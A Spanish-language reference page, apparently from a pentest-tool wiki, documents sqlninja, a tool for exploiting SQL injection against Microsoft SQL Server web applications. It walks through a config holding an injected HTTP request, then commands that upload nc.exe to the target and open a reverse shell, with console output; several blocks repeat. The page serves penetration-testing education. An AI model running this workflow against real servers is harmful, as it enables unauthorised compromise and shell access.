Menu
▾
▴
sqlninja-es
sqlninja
Fase(s):
Principal: Explotación.
Secundaria: N/A.
Descripción:
Es una herramienta cuya finalidad es ayudar en la explotación de vulnerabilidades SQL Injection en una aplicación Web, el aplicativo deberá tenercomo manejador de base dedatos Microsoft SQL Server. Provee módulos de ejecución cuya finalidadvadesde la obtención de información del manejador de base de datos, hasta obtener acceso al sistema operativo por medio de una shell.
Objetivo:
- Comprometer el servidor de base de datos por medio de la explotación de la vulnerabilidad SQL Injection.
Funcionalidades:
Tecnologías soportadas: Aplicaciones Web (HTTP/HTTPS).
Modo de ejecución: Activo.
Comprometer el servidor de base de datos por medio de la explotación de la vulnerabilidad SQL Injection para obtener acceso al servidor por medio de una shell.
- Obtiene información acerca del estado y configuraciones generales de la base de datos y del servidor de base de datos.
- Carga archivos ejecutables cuyo objetivo es generar una shell del servidor de base datos al equipo atacante.
- Realiza ataques de fuerza bruta para obtener acceso con la cuenta “sa” de SQL Server
- Abusa de la funcionalidad que posee el manejador SQL Server de poder ejecutar comandos del sistema.
Reportes:
Resultados exportables: X
Uso básico:
Obtener una Reverse Shell del servidor base de datos. Llenar el archivo de configuración de sqlninja con los siguientes datos:
- Petición HTTP con parámetro vulnerable.
- IP local.
El archivo lucirá de la siguiente manera:
…
########### HTTP REQUEST ############
# The entire HTTP request, including the exploit string and a marker for the
# SQL command to execute (__SQL2INJECT__)
# Be sure to include the vulnerable parameter and the character sequence that
# allows us to start injecting commands. In general this means, at least:
# - an apostrophe (if the parameter is a string)
# - a semicolon (to end the original query)
--httprequest_start--
POST http://URL/PAGE.aspx HTTP/1.1
Host: HOST_APPLICACION
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0)
OTRAS_CABECERAS
__VIEWSTATE=%2FwEPDwUKMjA3NjE4MDczNmRkf2IECGUitTpu0vVIUhu3wPxao%2FF6r4sHEdlYxzYXX%2F8%3D&
__EVENTVALIDATION=%2FwEWAwLv6%2FCgCgL%2F%2BOneAgKfwImNC3%2Fnbpb9DZ7tw0IU78vRV%2BiuANd7HLE5bz%2B5vRy0MIk6¶m_vulnerable=Dato';__SQL2INJECT__&ctl02=Search%21
--httprequest_end—
…
# Local host: your IP address (for backscan and revshell modes)
lhost = localhost
…
########### HTTP REQUEST ############
# The entire HTTP request, including the exploit string and a marker for the
# SQL command to execute (__SQL2INJECT__)
# Be sure to include the vulnerable parameter and the character sequence that
# allows us to start injecting commands. In general this means, at least:
# - an apostrophe (if the parameter is a string)
# - a semicolon (to end the original query)
--httprequest_start--
POST http://URL/PAGE.aspx HTTP/1.1
Host: HOST_APPLICACION
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0)
OTRAS_CABECERAS
__VIEWSTATE=%2FwEPDwUKMjA3NjE4MDczNmRkf2IECGUitTpu0vVIUhu3wPxao%2FF6r4sHEdlYxzYXX%2F8%3D&
__EVENTVALIDATION=%2FwEWAwLv6%2FCgCgL%2F%2BOneAgKfwImNC3%2Fnbpb9DZ7tw0IU78vRV%2BiuANd7HLE5bz%2B5vRy0MIk6¶m_vulnerable=Dato';__SQL2INJECT__&ctl02=Search%21
--httprequest_end—
…
# Local host: your IP address (for backscan and revshell modes)
lhost = localhost
…
Una vez que se termina de llenar el archivo de configuración se procede a ejecutar la herramienta, esta nos indicará con el mensaje Injection was successful! Let's rock !! :) que la vulnerabilidad es explotable.
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m t
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: xxx.xxx.xxx.xxx:80
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !! :)
</r00t@northernfortress.net>
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: xxx.xxx.xxx.xxx:80
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !! :)
</r00t@northernfortress.net>
Ejecute el comando . /sqlninja -m u y eleja la opción apps/nc.exe.
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m u
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: HOST_ATAQUE
Specify the binary or script file to upload
shortcuts:
1: apps/nc.exe
2: apps/dnstun.exe
3: apps/churrasco.exe
4: apps/icmpsh.exe
5: apps/vdmallowed.exe
6: apps/vdmexploit.dll
> 1
[+] Uploading /tmp/nc.scr debug script............
1540/1540 lines written
done!
[+] Converting script to executable... might take a while
[+] Checking that nc.exe has the expected filesize...
[+] Filesize corresponds... :) </r00t@northernfortress.net>
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: HOST_ATAQUE
Specify the binary or script file to upload
shortcuts:
1: apps/nc.exe
2: apps/dnstun.exe
3: apps/churrasco.exe
4: apps/icmpsh.exe
5: apps/vdmallowed.exe
6: apps/vdmexploit.dll
> 1
[+] Uploading /tmp/nc.scr debug script............
1540/1540 lines written
done!
[+] Converting script to executable... might take a while
[+] Checking that nc.exe has the expected filesize...
[+] Filesize corresponds... :) </r00t@northernfortress.net>
La herramienta subirá un archivo con el objetivo de ejecutar un Reverse Shell, utilice el siguiente comando para lograrlo ./sqlninja -m r.
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m r
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: xxx.xxx.xxx.xxx:80
Local port: PUERTO_LOCAL
tcp/udp [default: tcp]: PROTOCOLO_TCP_O_UDP
[+] waiting for shell on port PUERTO_LOCAL/PROTOCOLO...
Microsoft Windows #### [Version #####]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
whoami
HOSTNAME\USERNAME
</r00t@northernfortress.net>
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: xxx.xxx.xxx.xxx:80
Local port: PUERTO_LOCAL
tcp/udp [default: tcp]: PROTOCOLO_TCP_O_UDP
[+] waiting for shell on port PUERTO_LOCAL/PROTOCOLO...
Microsoft Windows #### [Version #####]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
whoami
HOSTNAME\USERNAME
</r00t@northernfortress.net>
Referencias:
Liga: http://sqlninja.sourceforge.net/
Autor (es): icesurfer
Contacto: r00t [at] northernfortress.net
Licencia: GPL versión 3